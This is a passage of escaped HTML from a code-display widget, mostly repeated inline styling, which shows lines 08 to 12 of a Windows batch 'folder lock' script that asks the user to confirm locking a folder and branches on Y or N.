!important; border-bottom-width: 0px !important; border-color: initial !important; border-left-color: rgb(108, 226, 108) !important; border-left-style: solid !important; border-left-width: 3px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 3.3em !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;span class="block" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: url(http://www.tudosobrehacker.com/plugins/content/codecitation/styles/wrapping.png) !important; background-position: 0px 1.1em !important; background-repeat: no-repeat !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 7px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 1.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; text-indent: -1.5em !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="plain" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: inline !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;:CONFIRM&lt;/code&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="line alt2" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="number" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(92, 92, 92) !important; display: block !important; float: left !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0.3em !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; width: 3em !important;"&gt;08.&lt;/code&gt;&lt;span class="content" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: rgb(248, 248, 248) !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-color: rgb(108, 226, 108) !important; border-left-style: solid !important; border-left-width: 3px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 3.3em !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;span class="block" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: url(http://www.tudosobrehacker.com/plugins/content/codecitation/styles/wrapping.png) !important; background-position: 0px 1.1em !important; background-repeat: no-repeat !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 7px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 1.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; text-indent: -1.5em !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="plain" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: inline !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;echo Are you sure you want to lock the folder(Y/N)&lt;/code&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="line alt1" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="number" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(92, 92, 92) !important; display: block !important; float: left !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0.3em !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; width: 3em !important;"&gt;09.&lt;/code&gt;&lt;span class="content" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: rgb(255, 255, 255) !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-color: rgb(108, 226, 108) !important; border-left-style: solid !important; border-left-width: 3px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 3.3em !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;span class="block" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: url(http://www.tudosobrehacker.com/plugins/content/codecitation/styles/wrapping.png) !important; background-position: 0px 1.1em !important; background-repeat: no-repeat !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 7px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 1.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; text-indent: -1.5em !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="plain" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: inline !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;set/p "cho=&amp;gt;"&lt;/code&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="line alt2" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="number" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(92, 92, 92) !important; display: block !important; float: left !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0.3em !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; width: 3em !important;"&gt;10.&lt;/code&gt;&lt;span class="content" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: rgb(248, 248, 248) !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-color: rgb(108, 226, 108) !important; border-left-style: solid !important; border-left-width: 3px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 3.3em !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;span class="block" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: url(http://www.tudosobrehacker.com/plugins/content/codecitation/styles/wrapping.png) !important; background-position: 0px 1.1em !important; background-repeat: no-repeat !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 7px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 1.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; text-indent: -1.5em !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="plain" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: inline !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;if %cho%==Y goto LOCK&lt;/code&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="line alt1" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="number" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(92, 92, 92) !important; display: block !important; float: left !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0.3em !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; width: 3em !important;"&gt;11.&lt;/code&gt;&lt;span class="content" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: rgb(255, 255, 255) !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-color: rgb(108, 226, 108) !important; border-left-style: solid !important; border-left-width: 3px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 3.3em !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;span class="block" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: url(http://www.tudosobrehacker.com/plugins/content/codecitation/styles/wrapping.png) !important; background-position: 0px 1.1em !important; background-repeat: no-repeat !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 7px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 1.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; text-indent: -1.5em !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="plain" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: inline !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;if %cho%==y goto LOCK&lt;/code&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="line alt2" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="number" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(92, 92, 92) !important; display: block !important; float: left !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0.3em !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; width: 3em !important;"&gt;12.&lt;/code&gt;&lt;span class="content" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: rgb(248, 248, 248) !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-color: rgb(108, 226, 108) !important; border-left-style: solid !important; border-left-width: 3px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 3.3em !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;span class="block" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: url(http://www.tudosobrehacker.com/plugins/content/codecitation/styles/wrapping.png) !important; background-position: 0px 1.1em !important; background-repeat: no-repeat !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 7px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 1.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; text-indent: -1.5em !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="plain" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: inline !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;if %cho%==n goto END&lt;/code&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="line alt1" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="number" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(92, 92, 92) !important; display: block !important; float: left !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0.3em !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; width: 3em !important;"&gt;13.&lt;/code&gt;&lt;span class="content" 